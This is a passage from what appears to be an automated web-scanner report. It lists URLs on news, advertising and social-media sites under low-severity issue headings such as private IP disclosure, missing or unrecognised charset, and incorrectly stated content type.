22.33. http://social.ndtv.com/tbModel/signin.php
22.34. http://thestar.com.my/news/story.asp
22.36. http://tidaltv.com/PrivacyDashboard.aspx
22.37. http://tidaltv.com/aboutus_who.html
22.38. http://tidaltv.com/optoutconfirm.html
22.39. http://tidaltv.com/publisher_overview.html
22.40. http://tidaltv.com/technology_overview.html
22.41. http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
22.42. http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
22.43. http://timesofindia.indiatimes.com/configspace/ads/TOI_mumbai_articlelist_36950_TOP.html
22.44. http://timesofindia.indiatimes.com/configspace/ads/googleadsarticlelistbot.html
22.45. http://timesofindia.indiatimes.com/configspace/ads/googleshowbtm.html
22.46. http://timesofindia.indiatimes.com/configspace/ads/googleshowtop.html
22.47. http://timesofindia.indiatimes.com/newtoolbar/9855193.cms
22.48. http://timesofindia.indiatimes.com/sponseredlinksros.cms
22.49. http://timesofindia.indiatimes.com/toifanapp.cms
22.50. http://timesofindia.indiatimes.com/toitopics_googleads.cms
22.51. http://timesofindia.indiatimes.com/topic/Xss
22.52. http://twitter.com/search
22.53. http://web.adblade.com/impsc.php
22.54. http://www.addthis.com/bookmark.php
22.56. http://www.amazon.com/dp/B002Y27P3M
22.57. http://www.asianewsnet.net/climate/detail.php
22.58. http://www.asianewsnet.net/home/
22.59. http://www.asianewsnet.net/home/epaper.php
22.60. http://www.asianewsnet.net/home/highlight.php
22.61. http://www.asianewsnet.net/home/news.php
22.62. http://www.asianewsnet.net/home/video.php
22.63. http://www.bangkokpost.com/
22.64. http://www.bangkokpost.com/ads/google_adsense_728x90.html
22.66. http://www.bangkokpost.com/blogs/index.php/2011/08/31/transparency-call-for-new-women-s-fund
22.67. http://www.bangkokpost.com/blogs/index.php/2011/09/02/in-venice-madonna-and-her-movie
22.69. http://www.bangkokpost.com/business/
22.70. http://www.bangkokpost.com/business/telecom
22.71. http://www.bangkokpost.com/classified/viewforum.php
22.72. http://www.bangkokpost.com/forum/search.php
22.73. http://www.bangkokpost.com/forum/viewforum.php
22.74. http://www.bangkokpost.com/forum/viewtopic.php
22.75. http://www.bangkokpost.com/search/news-and-article
22.76. http://www.connect.facebook.com/widgets/fan.php
22.77. http://www.connect.facebook.com/widgets/fan.php
22.78. http://www.dnaindia.com/
22.79. http://www.dnaindia.com/redirect
22.80. http://www.dnaindia.com/sport/report_rain-plays-spoilsport-first-odi-abandoned_1582791
22.82. http://www.dnaindia.com/world
22.83. http://www.egnyte.com/corp/lp1/FTP-site-2.html
22.84. https://www.google.com/adsense/support/bin/request.py
22.85. http://www.isomedia.com/business-vps.shtml
22.86. http://www.magicbricks.com/bricks/propertySearch.html
22.87. http://www.magicbricks.com/bricks/viewProperty.html
22.88. http://www.mid-day.com/news/index.htm/x26amp
22.89. http://www.mid-day.com/news/local/index.htm/x26amp
22.90. http://www.mumbaimirror.com/index.aspx
22.91. http://www.nationmultimedia.com/
22.92. http://www.nationmultimedia.com/breakingnews/
22.94. http://www.nationmultimedia.com/home/banner/125x125_food.htm
22.95. http://www.nationmultimedia.com/home/banner/ad_set1.html
22.96. http://www.nationmultimedia.com/home/banner/index_a13.html
22.97. http://www.nationmultimedia.com/home/banner/index_a2.html
22.98. http://www.nationmultimedia.com/home/banner/index_b2.html
22.99. http://www.nationmultimedia.com/home/banner/index_b5.html
22.100. http://www.nationmultimedia.com/home/banner/section/Breakingnews/300x250Breakingnews.html
22.101. http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
22.102. http://www.nationmultimedia.com/national/
22.103. http://www.nationmultimedia.com/specials/nationphoto/show.php
22.104. http://www.nationmultimedia.com/specials/nationvdo/showvdo.php
22.107. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
22.109. http://www.ndtv.com/search
22.110. http://www.ndtv.com/trends
22.111. http://www.ndtv.com/video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786
22.115. http://www.networkadvertising.org/managing/opt_out.asp
22.116. http://www.networkadvertising.org/managing/opt_out.asp
22.117. http://www.networkadvertising.org/managing/optout_results.asp
22.118. http://www.newspaperdirect.com/inprint/default.aspx
22.119. http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp
22.120. http://www.ticketmaster.com/Sporting-Kansas-City-tickets/artist/805957
22.121. http://www.timesjobs.com/candidate/job-search.html
22.122. http://www.timesjobs.com/candidate/quickSearch.html
22.123. http://www.youtube.com/results
22.124. http://www.zigwheels.com/dealeroffer.php
24.3. http://ads.masslive.com/
24.5. http://ads.nationchannel.com/
24.6. http://ads.nationmultimedia.com/
24.7. http://ads.oregonlive.com/
24.8. http://ads.reach360ads.com/
24.9. http://ads3.bangkokpost.co.th/
24.10. http://ads4.bangkokpost.co.th/
24.11. http://adssrv.nationmultimedia.com/
24.12. http://adstil.indiatimes.com/
24.13. http://advertising.aol.com/
24.15. http://bh.contextweb.com/
24.16. http://clk.fetchback.com/
24.18. http://d.tradex.openx.com/
24.19. http://dna1.mookie1.com/
24.21. http://dp.33across.com/
24.22. http://ecommerce.nationgroup.com/
24.25. http://ibeat.indiatimes.com/
24.27. http://image2.pubmatic.com/
24.28. http://img.pulsemgr.com/
24.29. http://imp.fetchback.com/
24.30. http://login.dotomi.com/
24.31. http://matcher-rbc.bidder7.mookie1.com/
24.32. http://member.bangkokpost.com/
24.33. http://mobile.indiatimes.com/
24.34. http://nai.ad.us-ec.adtechus.com/
24.35. http://nai.adserver.adtechus.com/
24.36. http://nai.adserverec.adtechus.com/
24.37. http://nai.adserverwc.adtechus.com/
24.38. http://nai.adsonar.com/
24.40. http://nai.advertising.com/
24.42. http://nai.glb.adtechus.com/
24.43. http://nai.tacoda.at.atwola.com/
24.44. http://nocookie.w55c.net/
24.45. http://notrack.adviva.net/
24.46. http://notrack.specificclick.net/
24.47. http://notrack.specificmedia.com/
24.48. http://optimized-by.rubiconproject.com/
24.49. http://optout.33across.com/
24.50. http://optout.adlegend.com/
24.51. http://optout.mookie1.com/
24.52. http://optout.mookie1.decdna.net/
24.53. http://optout.mookie1.decideinteractive.com/
24.54. http://optout.mookie1.pm14.com/
24.55. http://picasaweb.google.com/
24.56. http://pixel.33across.com/
24.57. http://pixel.fetchback.com/
24.58. http://pixel.rubiconproject.com/
24.59. http://pixel.traveladvertising.com/
24.60. http://plg3.yumenetworks.com/
24.63. http://search.spotxchange.com/
24.64. http://server3.yowindow.com/
24.65. http://shopping.indiatimes.com/
24.66. http://smart.synergy-e.com/
24.67. http://socialappsintegrator.indiatimes.com/
24.68. http://srv.clickfuse.com/
24.69. http://stat.synergy-e.com/
24.70. http://swf.yowindow.com/
24.71. http://system.casalemedia.com/
24.73. http://tap.rubiconproject.com/
24.75. http://twitterapi.indiatimes.com/
24.76. http://usucmweb.dotomi.com/
24.77. http://www.addthis.com/
24.78. http://www.asianewsnet.net/
24.79. http://www.bangkokpost.com/
24.80. http://www.casalemedia.com/
24.81. http://www.crosspixel.net/
24.83. http://www.fetchback.com/
24.84. http://www.isomedia.com/
24.85. http://www.magicbricks.com/
24.86. http://www.mathtag.com/
24.87. http://www.nationejobs.com/
24.88. http://www.nationmultimedia.com/
24.90. http://www.simplymarry.com/
24.91. http://www.timescity.com/
24.92. http://www.tribalfusion.com/
24.93. http://www.zigwheels.com/
25.1. http://ads4.bangkokpost.co.th/ads_server/iframe/
25.2. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH
25.3. http://advertising.aol.com/finish/0/4/1/
25.4. http://advertising.aol.com/finish/1/4/1/
25.5. http://advertising.aol.com/finish/2/4/1/
25.6. http://advertising.aol.com/finish/3/4/1/
25.7. http://advertising.aol.com/finish/4/4/1/
25.8. http://advertising.aol.com/finish/5/4/1/
25.9. http://advertising.aol.com/finish/6/4/1/
25.10. http://advertising.aol.com/finish/7/4/1/
25.11. http://advertising.aol.com/finish/8/4/1/
25.12. http://advertising.aol.com/token/0/2/1170877546/
25.13. http://advertising.aol.com/token/0/3/1885310732/
25.14. http://advertising.aol.com/token/1/1/1462706141/
25.15. http://advertising.aol.com/token/1/3/1308197307/
25.16. http://advertising.aol.com/token/2/2/2011729621/
25.17. http://advertising.aol.com/token/2/3/868831419/
25.18. http://advertising.aol.com/token/3/2/1144859041/
25.19. http://advertising.aol.com/token/3/3/963398391/
25.20. http://advertising.aol.com/token/4/1/1214941173/
25.21. http://advertising.aol.com/token/4/3/1727096706/
25.22. http://advertising.aol.com/token/5/2/2011695027/
25.23. http://advertising.aol.com/token/5/3/803328935/
25.24. http://advertising.aol.com/token/6/1/737485457/
25.25. http://advertising.aol.com/token/6/3/807811660/
25.26. http://advertising.aol.com/token/7/1/585611182/
25.27. http://advertising.aol.com/token/7/3/1807570122/
25.28. http://advertising.aol.com/token/8/1/592246145/
25.29. http://advertising.aol.com/token/8/3/1337747048/
25.30. http://cps.regis.edu/lp/computer_degree/it_degree.php
25.31. http://ibeat.indiatimes.com/js/pgtracking.js
25.32. http://images.google.com/support/bin/answer.py
25.33. https://maps-api-ssl.google.com/maps
25.34. http://maps.google.com/maps
25.35. http://member.bangkokpost.com/login.php
25.36. http://ndtvjobs.bixee.com/search/search/
25.37. http://social.ndtv.com/NDTVProfit
25.38. http://social.ndtv.com/groups.php
25.39. http://social.ndtv.com/home.php
25.40. http://social.ndtv.com/tbModel/comments.php
25.41. http://timesofindia.indiatimes.com/articleshow_js_v11.cms
25.42. http://timesofindia.indiatimes.com/new_cmtofart2_v4/9855193.cms
25.43. http://timesofindia.indiatimes.com/nv_js_v53.cms
25.44. http://translate.google.com/
25.45. http://www.asaservers.com/showpages.asp
25.46. http://www.bangkokpost.com/
25.48. http://www.bangkokpost.com/blogs/index.php/2011/08/31/transparency-call-for-new-women-s-fund
25.49. http://www.bangkokpost.com/blogs/index.php/2011/09/02/in-venice-madonna-and-her-movie
25.51. http://www.bangkokpost.com/business/
25.52. http://www.bangkokpost.com/business/telecom
25.53. http://www.bangkokpost.com/classified/viewforum.php
25.54. http://www.bangkokpost.com/common/js/calendar.js
25.55. http://www.bangkokpost.com/forum/search.php
25.56. http://www.bangkokpost.com/forum/viewforum.php
25.57. http://www.bangkokpost.com/forum/viewtopic.php
25.58. http://www.bangkokpost.com/search/news-and-article
25.59. http://www.google.com/advanced_search
25.60. http://www.google.com/finance
25.61. http://www.google.com/hostednews/afp/article/ALeqM5gm3VCeTz71UMLIhqucTh7x2Pzicw
25.62. http://www.google.com/hostednews/afp/article/ALeqM5jgTMTleLrfnZNS2m7IZ6da8aJZ9w
25.63. http://www.google.com/maps
25.64. http://www.google.com/preferences
25.65. http://www.google.com/quality_form
25.66. http://www.google.com/reader/link
25.67. http://www.google.com/reader/view/
25.68. http://www.google.com/support/websearch/bin/answer.py
25.69. http://www.google.com/webhp
25.70. https://www.google.com/accounts/ServiceLogin
25.71. https://www.google.com/adsense/support/bin/request.py
25.72. https://www.gotomeeting.com/t/gcon/2011_Q3/Contextual_CC/160x600/g2m_HDFaceslp
25.73. http://www.mid-day.com/news/index.htm/x26amp
25.74. http://www.modestogov.com/departments/x26amp
25.75. http://www.modestogov.com/mpd/x26amp
25.76. http://www.mumbaimirror.com/index.aspx
25.77. http://www.nationmultimedia.com/
25.78. http://www.nationmultimedia.com/breakingnews/
25.80. http://www.nationmultimedia.com/home/twitter-api/widget.js
25.81. http://www.nationmultimedia.com/national/
25.82. http://www.nationmultimedia.com/specials/nationphoto/show.php
25.83. http://www.nationmultimedia.com/specials/nationvdo/showvdo.php
25.84. http://www.scb.co.th/scb_api/scbapi.jsp
25.85. http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp
25.86. http://www.tmd.go.th/en/province.php
26. Private IP addresses disclosed
26.1. http://ad4.liverail.com/
26.2. http://ad4.liverail.com/
26.3. http://ad4.liverail.com/
26.4. http://api.facebook.com/restserver.php
26.5. http://api.facebook.com/restserver.php
26.6. http://api.facebook.com/restserver.php
26.7. http://api.facebook.com/restserver.php
26.8. http://connect.facebook.net/en_US/all.js
26.9. http://connect.facebook.net/en_US/all.js
26.10. http://connect.facebook.net/en_US/all.js
26.11. http://connect.facebook.net/en_US/all.js
26.12. http://connect.facebook.net/en_US/all.js
26.13. http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf
26.14. http://developers.facebook.com/plugins/
26.15. http://external.ak.fbcdn.net/safe_image.php
26.16. http://external.ak.fbcdn.net/safe_image.php
26.17. http://static.ak.connect.facebook.com/connect.php/en_US
26.19. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML
26.20. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif
26.21. http://static.ak.fbcdn.net/connect.php/js/FB.Share
26.22. http://static.ak.fbcdn.net/connect/xd_proxy.php
26.23. http://static.ak.fbcdn.net/connect/xd_proxy.php
26.24. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ql9vukDCc4R.png
26.25. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/bSOHtKbCGYI.png
26.26. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/GetYmfGSJIt.css
26.27. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/zZEOQP4uOC1.gif
26.28. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/9F14AO7Mj6i.js
26.29. http://trk.tidaltv.com/Trace.axd
26.30. http://www.connect.facebook.com/widgets/fan.php
26.31. http://www.connect.facebook.com/widgets/fan.php
26.32. http://www.connect.facebook.com/widgets/fan.php
26.33. http://www.connect.facebook.com/widgets/fan.php
26.34. http://www.facebook.com/campaign/landing.php
26.35. http://www.facebook.com/extern/login_status.php
26.36. http://www.facebook.com/extern/login_status.php
26.37. http://www.facebook.com/extern/login_status.php
26.38. http://www.facebook.com/extern/login_status.php
26.39. http://www.facebook.com/extern/login_status.php
26.40. http://www.facebook.com/extern/login_status.php
26.41. http://www.facebook.com/pages/Friends-of-The-Nation/147232991936
26.42. http://www.facebook.com/plugins/like.php
26.43. http://www.facebook.com/plugins/like.php
26.44. http://www.facebook.com/plugins/like.php
26.45. http://www.facebook.com/plugins/like.php
26.46. http://www.facebook.com/plugins/like.php
26.47. http://www.facebook.com/plugins/like.php
26.48. http://www.facebook.com/plugins/like.php
26.49. http://www.facebook.com/plugins/like.php
26.50. http://www.facebook.com/plugins/like.php
26.51. http://www.facebook.com/plugins/like.php
26.52. http://www.facebook.com/plugins/like.php
26.53. http://www.facebook.com/plugins/like.php
26.54. http://www.facebook.com/plugins/like.php
26.55. http://www.facebook.com/plugins/like.php
26.56. http://www.facebook.com/plugins/like.php
26.57. http://www.facebook.com/plugins/like.php
26.58. http://www.facebook.com/plugins/recommendations.php
26.59. http://www.facebook.com/plugins/recommendations.php
26.60. http://www.facebook.com/sharer.php
27.1. http://33across.com/api/opt-out.php
27.2. http://a.netmng.com/opt-status.php
27.3. http://a.rfihub.com/nai_check_status.gif
27.4. http://a.tribalfusion.com/displayAd.js
27.5. http://ad-apac.doubleclick.net/adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2
27.7. http://ad.doubleclick.net/adj/N3340.152125.OZONEMEDIA.COM/B5807973
27.8. http://ad.turn.com/server/ads.js
27.9. http://ad.yieldmanager.com/pixel
27.10. http://ad4.liverail.com/crossdomain.xml
27.11. http://adclick.g.doubleclick.net/aclk
27.13. http://ads.amgdgt.com/ads/opt-out
27.14. http://ads.bluelithium.com/st
27.15. http://ads.indiatimes.com/ads.dll/getad
27.16. http://ads.reach360ads.com/www/ads/iframe.php
27.17. http://ads.undertone.com/fc.php
27.18. http://ads3.bangkokpost.co.th/www/delivery/spc.php
27.19. http://adscontent.indiatimes.com/photo/7596584.cms
27.20. http://adscontent2.indiatimes.com/photo/9101637.cms
27.21. http://adserver.adtech.de/crossdomain.xml
27.22. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH
27.23. http://advertising.aol.com/nai/nai.php
27.24. https://adwords.google.com/um/StartNewLogin
27.25. http://api.facebook.com/restserver.php
27.26. http://as.casalemedia.com/j
27.27. http://as.serving-sys.com/OptOut/nai_optout_results.aspx
27.28. http://avn.innity.com/avnview.php
27.29. http://b.scorecardresearch.com/b
27.30. http://blogs.timesofindia.indiatimes.com/main/page/recentEntriesFeed
27.31. http://c7.zedo.com/img/bh.gif
27.32. http://cas.criteo.com/delivery/afr.php
27.33. http://cdn.dnaindia.com/images/710/favicon-google-bookmark.ico
27.34. http://cdn.optmd.com/V2/88918/233260/index.html
27.35. http://cdn.turn.com/server/ddc.htm
27.36. http://clk.atdmt.com/goiframe/171946551/278612752/direct
27.37. http://clk.fetchback.com/serve/fb/click
27.38. http://cm.g.doubleclick.net/pixel
27.39. http://cps.regis.edu/lp/computer_degree/it_degree.php
27.40. http://d.tradex.openx.com/afr.php
27.41. http://d13.zedo.com/OzoDB/cutils/R53_7_5/jsc/767/zpu.html
27.42. http://d2.zedo.com/jsc/d2/ff2.html
27.43. http://d3.zedo.com/jsc/d3/ff2.html
27.44. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js
27.45. http://dis.criteo.com/dis/rtb/google/cookiematch.aspx
27.46. http://dis.sv.us.criteo.com/dis/dis.aspx
27.47. http://dna1.mookie1.com/n/97164/98396/www.bp.com/1979rp7
27.48. https://docs.google.com/
27.49. http://domdex.com/nai_optout_status.php
27.50. http://dp.33across.com/ps/
27.51. http://events.adchemy.com/visitor/auuid/nai-status
27.52. http://fetchback.com/serve/fb/optout
27.53. http://googleads.g.doubleclick.net/pagead/ads
27.54. http://groups.google.com/groups
27.55. http://ib.mookie1.com/image.sbmx
27.56. http://idiva.com/index.php
27.57. http://images.google.com/support/bin/answer.py
27.58. http://images.photogallery.indiatimes.com/photo/8179309.cms
27.59. http://img.pulsemgr.com/optout
27.60. http://imp.fetchback.com/serve/fb/adtag.js
27.61. http://l.addthiscdn.com/live/t00/250lo.gif
27.62. http://load.exelator.com/load/
27.63. http://login.dotomi.com/ucm/UCMController
27.64. https://mail.google.com/mail/
27.65. https://maps-api-ssl.google.com/maps
27.66. http://maps.google.com/maps
27.67. https://market.android.com/developer
27.68. http://media2.legacy.com/bind
27.69. http://nai.ad.us-ec.adtechus.com/nai/daa.php
27.70. http://nai.adserver.adtechus.com/nai/daa.php
27.71. http://nai.adserverec.adtechus.com/nai/daa.php
27.72. http://nai.adserverwc.adtechus.com/nai/daa.php
27.73. http://nai.adsonar.com/nai/daa.php
27.74. http://nai.adtech.de/nai/daa.php
27.75. http://nai.advertising.com/nai/daa.php
27.76. http://nai.btrll.com/nai/status
27.77. http://nai.glb.adtechus.com/nai/daa.php
27.78. http://nai.tacoda.at.atwola.com/nai/daa.php
27.79. http://ndtvjobs.bixee.com/search/search/
27.80. http://netspiderads2.indiatimes.com/ads.dll/getad
27.81. http://netspiderads3.indiatimes.com/ads.dll/getad
27.82. http://news.google.com/news/story
27.83. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e
27.84. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top
27.85. http://optout.33across.com/api/
27.86. http://optout.cognitivematch.com/optoutStatus
27.87. http://optout.crwdcntrl.net/optout/check.php
27.88. http://optout.invitemedia.com:9030/check_optout
27.89. http://optout.media6degrees.com/orbserv/NAIStatus
27.90. http://optout.mxptint.net/naistatus.ashx
27.91. http://p.opt.fimserve.com/nai_check.jsp
27.92. http://p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.714851.s1.v4.ipv6-exp.l.google.com/gen_204
27.93. http://pagead2.googlesyndication.com/pagead/imgad
27.94. http://pbid.pro-market.net/engine
27.95. http://picasaweb.google.com/lh/view
27.96. http://pixel.33across.com/ps/
27.97. http://pixel.adblade.com/log.php
27.98. http://pixel.fetchback.com/serve/fb/optout
27.99. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif
27.100. http://pr.prchecker.info/getpr.php
27.101. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064
27.102. http://profile.live.com/badge
27.103. http://property.ndtv.com/ndtv_redirect.php
27.104. http://pubads.g.doubleclick.net/gampad/ads
27.105. http://r.casalemedia.com/rum
27.106. http://r.turn.com/r/beacon
27.108. http://r1.zedo.com/log/ERR.gif
27.109. http://s.xp1.ru4.com/coop
27.110. http://s.ytimg.com/yt/swfbin/cps-vflNVWyCR.swf
27.111. http://s0.2mdn.net/2230348/IN2033_Earth_728_E.swf
27.112. http://scholar.google.com/scholar
27.113. http://search.spotxchange.com/crossdomain.xml
27.114. http://search.twitter.com/search.json
27.115. http://server3.yowindow.com/crossdomain.xml
27.116. http://shopping.indiatimes.com/ism/faces/tracker.jsp
27.117. https://sites.google.com/
27.118. http://social.ndtv.com/static/Comment/List/
27.119. http://srv.clickfuse.com/pixels/create.php
27.120. http://static.ak.fbcdn.net/connect/xd_proxy.php
27.121. http://swf.yowindow.com/wimo/hpPal/hpPal.swf
27.122. http://sync.mathtag.com/sync/img
27.123. http://t4.liverail.com/
27.124. http://tag.admeld.com/match
27.125. http://thestar.com.my/news/story.asp
27.126. http://timescity.com/widget/toitopestw.php
27.127. http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
27.128. http://translate.google.com/
27.129. http://tweetmeme.com/auth/login
27.131. https://twitter.com/home
27.132. http://unitus.synergy-e.com/www/delivery/spcjs.php
27.133. http://web.adblade.com/impsc.php
27.134. http://webcache.googleusercontent.com/search
27.135. http://www.adbrite.com/mb/nai_optout_check.php
27.136. http://www.addthis.com/bookmark.php
27.137. http://www.amazon.com/
27.138. http://www.asaservers.com/showpages.asp
27.139. http://www.bangkokpost.com/
27.140. http://www.bizographics.com/nai/status
27.141. http://www.casalemedia.com/cgi-bin/naiOptout.cgi
27.142. http://www.connect.facebook.com/widgets/fan.php
27.143. http://www.dnaindia.com/
27.144. http://www.egnyte.com/corp/lp1/FTP-site-2.html
27.145. http://www.emirates.com/us/english/index.aspx
27.146. http://www.facebook.com/plugins/like.php
27.147. http://www.fetchback.com/resources/naicheck.php
27.148. http://www.godaddy.com/gdshop/ssl/ssl.asp
27.149. http://www.google-analytics.com/__utm.gif
27.150. http://www.google.com/jsapi
27.151. https://www.google.com/calendar
27.152. http://www.googleadservices.com/pagead/conversion/1033191019/
27.153. http://www.homestead.com/~site/go/search.ffhtml
27.155. http://www.isomedia.com/business-vps.shtml
27.156. http://www.jdoqocy.com/click-2118118-10473284
27.157. http://www.linkedin.com/shareArticle
27.158. http://www.magicbricks.com/bricks/viewProperty.html
27.159. http://www.mathtag.com/cgi-bin/optout
27.160. http://www.mediaplex.com/status_pure.php
27.161. http://www.modestogov.com/mpd/x26amp
27.163. http://www.mumbaimirror.com/index.aspx
27.164. http://www.nationejobs.com/fulltime/displayposition_thai.php
27.165. http://www.nationmultimedia.com/css/NT-styles.css
27.166. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
27.167. http://www.npr.org/music/
27.168. http://www.pulse360.com/behavior/nai-opt-out.html
27.169. http://www.realmedia.com/cgi-bin/nph-verify_oo.cgi
27.170. http://www.simplymarry.com/timesmatri/faces/jsp/searchResult.photo
27.171. http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/
27.172. http://www.taiwannews.com.tw/etn/news_content.php
27.173. http://www.ticketmaster.com/Sporting-Kansas-City-tickets/artist/805957
27.174. http://www.timesjobs.com/candidate/job-search.html
27.175. http://www.tribalfusion.com/optout/verify.js
27.176. http://www.watchindia.tv/AffiliateWiz/aw.aspx
27.177. http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&
27.178. http://www.youtube.com/results
27.179. http://www.zigwheels.com/dealeroffer.php
27.180. http://www2.glam.com/app/site/affiliate/nc/gs-optout.act
27.182. http://yads.zedo.com/ads2/c
28.1. https://maps-api-ssl.google.com/maps
28.2. https://www.google.com/adsense/support/bin/request.py
29. HTML does not specify charset
29.1. http://a.tribalfusion.com/j.ad
29.2. http://ad-apac.doubleclick.net/adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2
29.3. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.250
29.4. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.306
29.5. http://ad.doubleclick.net/clk
29.6. http://ad.yieldmanager.com/iframe3
29.7. http://ad4.liverail.com/util/companions.php
29.8. http://ads.indiatimes.com/ads.dll/genptypead
29.9. http://ads.indiatimes.com/ads.dll/getad
29.10. http://ads.indiatimes.com/ads.dll/photoserv
29.11. http://adscontent.indiatimes.com/photo.cms
29.12. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446945/0/0/ADTECH
29.21. http://advertising.aol.com/nai/nai.php
29.22. http://api.tweetmeme.com/ajax/partial
29.23. http://api.tweetmeme.com/v2/follow.js
29.24. http://beacon.videoegg.com/abandoned
29.25. http://beacon.videoegg.com/admodelreceived
29.26. http://beacon.videoegg.com/adpo
29.27. http://beacon.videoegg.com/amcload
29.28. http://beacon.videoegg.com/coreloaded
29.29. http://beacon.videoegg.com/demo
29.30. http://beacon.videoegg.com/domloaded
29.31. http://beacon.videoegg.com/echo
29.32. http://beacon.videoegg.com/init
29.33. http://beacon.videoegg.com/initjs
29.34. http://beacon.videoegg.com/interact
29.35. http://beacon.videoegg.com/invpos
29.36. http://beacon.videoegg.com/pageloaded
29.37. http://beacon.videoegg.com/tload
29.38. http://core.videoegg.com/eap/14533/html/jstags.html
29.39. http://core.videoegg.com/eap/latest/html/jstags.html
29.40. http://cricket.widgets.stats.com/ndtv_wc/miniscorecard_IPL2011.html
29.41. http://d13.zedo.com/OzoDB/cutils/R53_7_5/jsc/767/zpu.html
29.42. http://d2.zedo.com/jsc/d2/ff2.html
29.43. http://d3.zedo.com/jsc/d3/ff2.html
29.44. http://ib.adnxs.com/click
29.45. http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html
29.46. http://mobile.indiatimes.com/pmswapdev_in/pmsdata.html
29.49. http://msite.martiniadnetwork.com/index/
29.50. http://netspiderads2.indiatimes.com/ads.dll/getad
29.51. http://netspiderads2.indiatimes.com/ads.dll/getxmlad
29.52. http://netspiderads2.indiatimes.com/ads.dll/photoserv
29.53. http://netspiderads3.indiatimes.com/ads.dll/getad
29.54. http://netspiderads3.indiatimes.com/ads.dll/photoserv
29.57. http://ping.chartbeat.net/ping
29.58. http://rcm.amazon.com/e/cm
29.59. http://tidaltv.com/aboutus_who.html
29.60. http://tidaltv.com/favicon.ico
29.61. http://tidaltv.com/optoutconfirm.html
29.62. http://tidaltv.com/publisher_overview.html
29.63. http://tidaltv.com/technology_overview.html
29.64. http://timesofindia.indiatimes.com/configspace/ads/TOI_mumbai_articlelist_36950_TOP.html
29.65. http://timesofindia.indiatimes.com/configspace/ads/googleadsarticlelistbot.html
29.66. http://timesofindia.indiatimes.com/configspace/ads/googleshowbtm.html
29.67. http://timesofindia.indiatimes.com/configspace/ads/googleshowtop.html
29.68. http://timesofindia.indiatimes.com/sponseredlinksros.cms
29.69. http://twitterapi.indiatimes.com/feedtweet/tweet
29.70. http://uac.advertising.com/wrapper/aceUACping.htm
29.71. http://web.adblade.com/clicks.php
29.72. http://web.adblade.com/impsc.php
29.73. http://www.dnaindia.com/
29.74. http://www.dnaindia.com/comments_display_frame710.php
29.75. http://www.dnaindia.com/redirect
29.76. http://www.dnaindia.com/sport/report_rain-plays-spoilsport-first-odi-abandoned_1582791
29.78. http://www.dnaindia.com/world
29.79. http://www.mtv.com/news/articles/1670209/1991-pearl-jam-soundgarden-nirvana.jhtml/x26amp
29.80. http://www.mtv.com/news/articles/1670218/jennifer-lopez-american-idol.jhtml/x26amp
29.82. http://www.ndtv.com/news/redirect/url.php
29.83. http://www.ndtv.com/news/utils/new_ajax_gateway.php
29.84. http://www.networkadvertising.org/managing/opt_out.asp
29.85. http://www.networkadvertising.org/managing/optout_results.asp
29.86. http://www.taiwannews.com.tw/etn/news_content.php
29.87. http://www.tribalfusion.com/test/opt.js
29.88. http://yads.zedo.com/ads3/a
30. HTML uses unrecognised charset
30.1. http://truehits.net/stat.php
30.2. http://www.nationejobs.com/fulltime/displayposition_thai.php
30.3. http://www.scb.co.th/scb_api/api_a_deposit.jsp
30.4. http://www.scb.co.th/scb_api/scbapi.jsp
30.5. http://www.tmd.go.th/en/daily_forecast_forweb.php
30.6. http://www.tmd.go.th/en/province.php
31. Content type incorrectly stated
31.1. http://ad.doubleclick.net/clk
31.2. http://ads.indiatimes.com/ads.dll/genptypead
31.3. http://ads3.bangkokpost.co.th/www/delivery/spc.php
31.4. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH
31.5. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446945/0/0/ADTECH
31.6. http://api.tweetmeme.com/ajax/partial
31.7. http://api.tweetmeme.com/v2/follow.js
31.8. http://beacon.videoegg.com/abandoned
31.9. http://beacon.videoegg.com/admodelreceived
31.10. http://beacon.videoegg.com/adpo
31.11. http://beacon.videoegg.com/amcload
31.12. http://beacon.videoegg.com/coreloaded
31.13. http://beacon.videoegg.com/demo
31.14. http://beacon.videoegg.com/domloaded
31.15. http://beacon.videoegg.com/echo
31.16. http://beacon.videoegg.com/init
31.17. http://beacon.videoegg.com/initjs
31.18. http://beacon.videoegg.com/interact
31.19. http://beacon.videoegg.com/invpos
31.20. http://beacon.videoegg.com/pageloaded
31.21. http://beacon.videoegg.com/tload
31.22. http://blogs.timesofindia.indiatimes.com/main/page/recentEntriesFeed
